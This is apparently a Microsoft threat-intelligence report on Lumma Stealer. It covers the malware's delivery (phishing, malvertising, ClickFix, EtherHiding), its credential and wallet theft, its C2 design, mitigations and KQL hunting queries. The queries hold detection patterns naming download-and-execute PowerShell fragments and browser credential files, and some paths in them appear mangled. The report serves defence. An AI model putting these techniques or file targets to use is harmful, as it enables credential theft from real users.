Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer

Over the past year, Microsoft has closely monitored the increasing sophistication and prevalence of Lumma Stealer, an infostealer malware employed by various financially motivated threat actors across multiple sectors. Our investigation into Lumma Stealer’s distribution framework has unveiled a complex and resilient ecosystem that utilizes phishing, malvertising, exploitation of trusted platforms, and traffic distribution systems. These insights highlight the critical need for collaborative efforts to combat cybercrime. In partnership with industry stakeholders and international law enforcement, Microsoft recently played a pivotal role in disrupting Lumma’s infrastructure.

Lumma Stealer, also referred to as LummaC2, operates as a malware-as-a-service (MaaS) solution capable of extracting data from a range of browsers and applications, including cryptocurrency wallets, while also facilitating the installation of additional malware. Microsoft Threat Intelligence identifies the entity behind Lumma as Storm-2477, which maintains the malware, its command-and-control (C2) infrastructure, and the Lumma MaaS. Affiliates who subscribe to Storm-2477 can access a panel to create the malware binary and manage C2 communications along with the information obtained from victims. Notably, ransomware groups such as Octo Tempest, Storm-1607, Storm-1113, and Storm-1674 have incorporated Lumma Stealer into their operations.

Lumma Stealer delivery techniques

Lumma Stealer employs a diverse and evolving array of delivery mechanisms. Campaigns frequently integrate multiple techniques, dynamically adjusting to evade detection and enhance infection rates. The delivery infrastructure is designed to be transient, swiftly shifting across domains, platforms, and geographical locations to avoid disruption.

• Phishing emails: Lumma Stealer campaigns often utilize emails that impersonate reputable brands and services, delivering links or attachments designed to create a sense of urgency. These emails may appear as critical hotel reservation confirmations or pending cancellations, directing victims to cloned websites or malicious servers that execute the Lumma payload.

• Malvertising: Threat actors inject deceptive advertisements into search engine results, targeting software-related queries such as “Notepad++ download” or “Chrome update.” Clicking these tainted links leads users to counterfeit websites that closely resemble legitimate vendors, ultimately delivering Lumma Stealer.
• Drive-by downloads on compromised websites: Attackers have been observed compromising legitimate websites, typically exploiting vulnerabilities or misconfigurations. They alter site content to insert malicious JavaScript, which executes when unsuspecting users visit the sites, delivering payloads or prompting users to take further actions.
• Trojanized applications: In numerous campaigns, cracked or pirated versions of legitimate applications are bundled with Lumma binaries and disseminated via file-sharing platforms. These modified installers often operate silently, executing the malware post-launch without any visible payload during installation.
• Abuse of legitimate services and ClickFix: Public repositories like GitHub are exploited to host scripts and binaries disguised as tools or utilities. A particularly deceptive tactic involves fake CAPTCHA pages, commonly seen in the ClickFix ecosystem, where targets are misled into executing malicious commands under the guise of passing a verification check.
• Dropped by other malware: Microsoft Threat Intelligence has noted that other loaders and malware, such as DanaBot, have delivered Lumma Stealer as an additional payload.

These methods reflect the behavior of threat actors who prioritize the exploitation of user trust, manipulation of legitimate infrastructure, and multi-layered distribution chains designed to circumvent both technical and human defenses. The following sections delve into specific campaigns that employed these distribution techniques to deliver Lumma Stealer.

Drive-by download campaign leveraging EtherHiding and ClickFix to deliver Lumma

In early April 2025, Microsoft detected a cluster of compromised websites utilizing EtherHiding and ClickFix techniques to install Lumma Stealer. EtherHiding involves leveraging smart contracts on blockchain platforms like Binance Smart Chain (BSC) to host segments of malicious code, rendering traditional blocking methods less effective. Meanwhile, the ClickFix technique exploits human problem-solving tendencies by displaying fake error messages that instruct users to copy and paste commands, ultimately leading to malware downloads.

During this campaign, the JavaScript injected into compromised websites directly contacted BSC to retrieve the ClickFix code, which was then presented to the target. Users were prompted to click an “I’m not a robot” checkbox, which copied a command into their clipboard. They were subsequently instructed to paste and execute this command via the Windows Run prompt, resulting in the download and execution of further code.

Email campaign targeting organizations in Canada to deliver Lumma Stealer

On April 7, 2025, Microsoft Threat Intelligence observed an extensive email campaign targeting organizations in Canada. The emails employed invoice lures related to fitness plans or online education platforms, with subject lines personalized to include recipient-specific details. This attack chain utilized various tools available on underground forums for traffic filtering and social engineering.

The emails contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites, which redirected users to an attacker-controlled website that hosted the ClickFix framework. Similar to the previous campaign, targets were instructed to click a “I’m not a robot” prompt and execute malicious code through a multi-step process. The malicious code initiated a PowerShell command that ultimately downloaded and executed a Lumma Stealer executable, which notably included Xworm malware.

Lumma Stealer malware analysis

The core Lumma Stealer malware is developed using a combination of C++ and ASM, designed as a MaaS offering. Threat actors can access a panel to create the malware binary and manage C2 communications and stolen information. The core binary employs advanced obfuscation techniques, including low-level virtual machine (LLVM core), Control Flow Flattening (CFF), and customized stack decryption, making static analysis challenging. Most critical APIs are implemented via low-level syscalls and Heavens Gate Technology.

Process injection and process hollowing

Lumma loader may utilize process hollowing to inject its malicious payload into legitimate system processes, such as msbuild.exe, regasm.exe, regsvcs.exe, and explorer.exe. This technique allows the malware to execute under the guise of trusted binaries, evading behavioral detection and endpoint monitoring tools.

Information-stealing capabilities

Lumma Stealer is designed to extract a wide range of user data through specialized routines for each data type. These capabilities have evolved, with recent observations indicating that instructions for targeting credentials are specified in the configuration file retrieved from the active C2 server. The configuration file is organized into sections detailing target applications for cryptocurrency wallets and extensions, as well as browser applications and user file locations.

• Browser credentials and cookies: Lumma Stealer extracts saved passwords, session cookies, and autofill data from Chromium-based browsers, including Edge, as well as Mozilla browsers.
• Cryptocurrency wallets and extensions: The malware actively searches for wallet files, browser extensions, and local keys associated with wallets like MetaMask, Electrum, and Exodus.
• Various applications: Lumma Stealer targets data from virtual private networks (VPNs), email clients, FTP clients, and Telegram applications.
• User documents: The malware harvests files from user profiles and common directories, particularly those with .pdf, .docx, or .rtf extensions.
• System metadata: Lumma Stealer collects telemetry data such as CPU information, OS version, system locale, and installed applications to tailor future exploits or profile victims.

C2 communication

Lumma Stealer maintains a robust C2 infrastructure, utilizing a combination of hardcoded tier 1 C2s that are regularly updated and reordered, alongside fallback C2s hosted on platforms like Steam and Telegram. The Telegram C2 is prioritized, while the Steam C2 is checked only when all hardcoded C2s are inactive. To obscure the actual C2 servers, all communications are routed through a Cloudflare proxy.

Affiliates can share tier 1 C2s, with the option to add a personal tier 1 C2 domain for an additional fee. Various obfuscation techniques protect the C2 servers, with different encryption methods applied to each set of servers. For instance, hardcoded C2s and Telegram fallback URLs are secured with ChaCha20 encryption, while Steam profile fallback URLs utilize a custom stack-based encryption algorithm that varies with each Lumma malware version.

Microsoft’s Digital Crimes Unit (DCU) has developed tools to identify and map the Lumma Stealer C2 infrastructure. As part of the disruption effort announced on May 21, Microsoft’s DCU has facilitated the takedown, suspension, and blocking of approximately 2,300 malicious domains that constituted the backbone of the Lumma Stealer infrastructure.

Recommendations

To mitigate the impact of Lumma Stealer, Microsoft Threat Intelligence recommends the following measures:

Strengthen Microsoft Defender for Endpoint configuration

• Ensure tamper protection is enabled in Microsoft Defender for Endpoint.
• Enable network protection in Microsoft Defender for Endpoint.
• Activate web protection.
• Run endpoint detection and response (EDR) in block mode to remediate malicious artifacts detected post-breach.
• Configure investigation and remediation in fully automated mode to allow immediate action on alerts.
• Microsoft Defender XDR customers can enable attack surface reduction rules to prevent common attack techniques.

Strengthen operating environment configuration

• Implement multifactor authentication (MFA) to enhance identity security.
• Utilize phishing-resistant authentication methods such as FIDO Tokens or Microsoft Authenticator with passkey.
• Enforce Entra ID Conditional Access authentication strength for critical applications.
• Encourage the use of Microsoft Edge with Microsoft Defender SmartScreen for enhanced protection against malicious sites.
• Enable Network Level Authentication for Remote Desktop Service connections.
• Activate Local Security Authority (LSA) protection to prevent credential theft.
• Utilize AppLocker to restrict access to specific software tools within the organization.

Detection details

Microsoft Defender XDR customers can refer to the following list of applicable detections related to Lumma Stealer:

Microsoft Defender Antivirus

Microsoft Defender Antivirus identifies this threat as the following malware:

Microsoft Defender for Endpoint

The following alerts may indicate threat activity associated with Lumma Stealer:

• Suspicious command in RunMRU registry
• Possible Lumma Stealer activity
• Information stealing malware activity
• Suspicious PowerShell command line
• Use of living-off-the-land binary to run malicious code
• Possible theft of passwords and sensitive web browser information
• Suspicious DPAPI Activity
• Suspicious mshta process launched
• Renamed AutoIt tool
• Suspicious phishing activity detected
• Suspicious implant process from a known emerging threat
• A process was injected with potentially malicious code
• Process hollowing detected
• Suspicious PowerShell download or encoded command execution
• A process was launched on a hidden desktop

Microsoft Defender for Office 365

Microsoft Defender for Office 365 identifies and blocks malicious emails, with alerts that may also indicate unrelated threat activity:

• A potentially malicious URL click was detected
• Email messages containing malicious URLs removed after delivery
• Email messages removed after delivery
• A user clicked through to a potentially malicious URL
• Suspicious email sending patterns detected
• Email reported by user as malware or phishing

Defender for Office 365 also detects and blocks Prometheus TDS, EtherHiding patterns, and ClickFix landing pages.

Microsoft Security Copilot

Customers utilizing Security Copilot can leverage the standalone experience to create custom prompts or execute pre-built promptbooks for automating incident response or investigation tasks related to Lumma Stealer:

• Incident investigation
• Microsoft User analysis
• Threat actor profile
• Threat Intelligence 360 report based on MDTI article
• Vulnerability impact assessment

Some promptbooks may require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can access the following reports within Microsoft products to obtain the latest information regarding threat actors, malicious activities, and techniques discussed in this blog. These reports provide essential intelligence, protection information, and recommended actions to prevent, mitigate, or respond to threats identified in customer environments.

Microsoft Defender Threat Intelligence

Customers utilizing Microsoft Security Copilot can also access the integration within Microsoft Defender Threat Intelligence for further insights into this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can execute the following query to identify related activities within their networks:

ClickFix commands execution

DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"CurrentVersionExplorerRunMRU"
| where RegistryValueData has ""
        or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
             and RegistryValueData matches regex "[u0400-u04FFu0370-u03FFu0590-u05FFu0600-u06FFu0E00-u0E7Fu2C80-u2CFFu13A0-u13FFu0530-u058Fu10A0-u10FFu0900-u097F]")
        or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ ("mshta.exe1", "mshta1"))
        or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
        or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
            and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String",  "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
              or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*s[A-Za-z0-9+/=]{15,}"))

DPAPI decryption via AutoIT or .NET Framework processes

DeviceEvents
| where ActionType == "DpapiAccessed"
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
      or InitiatingProcessImageFilePath has "windowsmicrosoft.netframework"
      or InitiatingProcessFileName =~ "powershell.exe"
| where (AdditionalFields hasany("Google Chrome", "Microsoft Edge") and AdditionalFields hasany("SPCryptUnprotect"))
| extend json = parse_json(AdditionalFields)
| extend dataDesp = tostring(json.DataDescription.PropertyValue)
| extend opType = tostring(json.OperationType.PropertyValue)
| where dataDesp in~ ("Google Chrome", "Microsoft Edge", "Chromium", "Opera", "Opera GX", "IMAP Password", "Brave Browser", "AVG Secure Browser") 
        and opType =~ "SPCryptUnprotect"
| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

Sensitive browser file access via AutoIT or .NET Framework processes

let browserDirs = pack_array(@"GoogleChromeUser Data", @"MicrosoftEdgeUser Data", @"MozillaFirefoxProfiles"); 
let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db");
DeviceEvents
| where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events.
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
      or InitiatingProcessImageFilePath has "windowsmicrosoft.netframework"
      or InitiatingProcessFileName =~ "powershell.exe"
| where (AdditionalFields hasany(browserDirs) or AdditionalFields hasany(browserSensitiveFiles)) 
| extend json = parse_json(AdditionalFields)
| extend File_Name = tostring(json.FileName.PropertyValue)
| where (FileName hasany (browserDirs) and FileName hasany (browserSensitiveFiles))
| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name

Learn more

For the latest security research from the Microsoft Threat Intelligence community, visit the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To stay informed about new publications and engage in discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, on X (formerly Twitter) at https://x.com/MsftSecIntel, and on Bluesky at https://bsky.app/profile/threatintel.microsoft.com.

For insights and stories from the Microsoft Threat Intelligence community regarding the evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.